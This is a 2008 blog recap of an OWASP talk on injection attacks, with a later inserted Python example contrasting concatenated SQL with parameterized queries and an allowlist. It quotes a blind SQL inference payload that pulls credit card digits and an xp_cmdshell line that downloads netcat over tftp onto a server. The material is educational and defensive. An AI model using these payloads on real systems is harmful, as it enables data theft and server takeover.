June OWASP – Injection Attacks

JP Sklenka’s posse from Cintas showed up at today’s OWASP event at the Citi offices in Blue Ash.  Cintas had four people there!  Kudos to them for taking visible steps towards application security.  I also ran into Russ McMahon from UC.  Wayne Browning was in town today and attended part of the event.  And it was great running into Marco and Allison.  James Walden, Ph.D., assistant professor at NKU, did a fabulous job with application injection attacks.  Frankly, I expected a run-of-the-mill SQL injection talk.  James took it deep and had me engaged for the entire hour.

I believe we’ll have a link to the presentation once it’s posted.  Here is a quick overview of some of the high points. Injection attacks happen when your code builds a statement by string concatenation and never notices that control characters have been placed in the user-submitted string.  Generally, an attacker extends the intended SQL to perform additional database operations, resulting in leaked, lost, or manipulated data.  Although SQL is the most common injection type, any string concatenation is vulnerable to an injection attack.  You’ll need to consider interactions with a shell, scripting environments (especially where an eval() function is available), file paths, XML, XPath, LDAP, and other environments in order to plan for and thwart attack vectors.

How do you know if you have a SQL injection problem?  While not a thorough analysis, if you submit a single quote in a field and get an error, then you probably have an issue.  If you then submit a double quote, and your error goes away, yep, you do have a problem.

Injection issues can manifest themselves in any database statement.  Although SELECT statements are the most common exploit, UPDATE and other statements are also vulnerable.  Testing vulnerabilities generally involves truncating the existing SQL and adding a condition that always evaluates to true, e.g. 1=1.  Be careful testing an update vulnerability and make sure you add your tests to the SET clause rather than the WHERE clause, because a 1=1 in the WHERE will modify the data for every row.  Hmmm…I guess that requires the warning to only test on test databases.

James also took some time to detail inference attacks where an attacker picks apart your database piece by piece, step by step.  For instance after figuring out which table contains credit card numbers, an attacker could insert SQL code like this to grab one digit of a number at a time:

substring((SELECT TOP 1 number FROM CreditCard), 1, 1) = 1

So make sure you log all database activity so that your security tripwires would warn you when, say, the CreditCard table has been accessed 10 million times today when your business has only had 8 thousand transactions.

SQL Server allows extended procedures which can give an exploiter authority to run shell commands and take over the server itself.  A command might look something like this:

exec master..xp_cmdshell 'tftp 192.168.1.1 GET mc.exe c:\nc.exe'

Once an attacker owns your server and can upload executable code at will, they can install backdoor access and cover their tracks so that you never know they got in.

The CORE IMPACT toolkit, used to test vulnerabilities, can be used to generate attacks.  And it comes with a money-back guarantee and 1 year of support 🙂

At the very least, make sure your string-building routines whitelist validate all input, meaning that before any user input makes it to the database you’ve scrubbed it against only what is allowed, and if it’s not allowed you don’t use it and return an error to the user.  Whitelist and parameterized queries should keep you fairly safe.  Understand, though, that you must stay vigilant, as your potential attackers are more creative than you are disciplined.
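As an added illustration (not code from the talk or from this post), here are the approaches above side by side in Python against a small in-memory SQLite table constructed for the example: the string concatenation the post warns about, the same lookup with a bound parameter, and an allowlist check placed in front of it. The single-quote probe from earlier in the post is wrapped in a small function so the difference between the two lookups can be observed directly.

```python
import re
import sqlite3

# Constructed sample database for the example; not from the original post.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users (name TEXT, balance INTEGER);
    INSERT INTO users VALUES ('alice', 10), ('bob', 20), ('carol', 30);
""")


def lookup_concat(name):
    """Vulnerable: user input is spliced into the SQL text itself."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_param(name):
    """Hardened: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT name FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


# Allowlist: only what a user name is permitted to contain (assumed policy).
NAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def is_allowed(name):
    """True only if the whole input matches the allowed alphabet."""
    return NAME_RE.fullmatch(name) is not None


def lookup_allowlisted(name):
    """Defense in depth: reject disallowed input before any query runs."""
    if not is_allowed(name):
        raise ValueError("input rejected by allowlist")
    return lookup_param(name)


def quote_probe(lookup):
    """The single-quote check from the post: does a lone quote break the query?"""
    try:
        lookup("'")
        return False
    except sqlite3.DatabaseError:
        return True
```

With the concatenated version, the input `x' OR 1=1 --` turns the WHERE clause into a tautology and returns every row; the parameterized version searches for that literal string and returns nothing.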

Andy

~ by Andy on June 25, 2008.
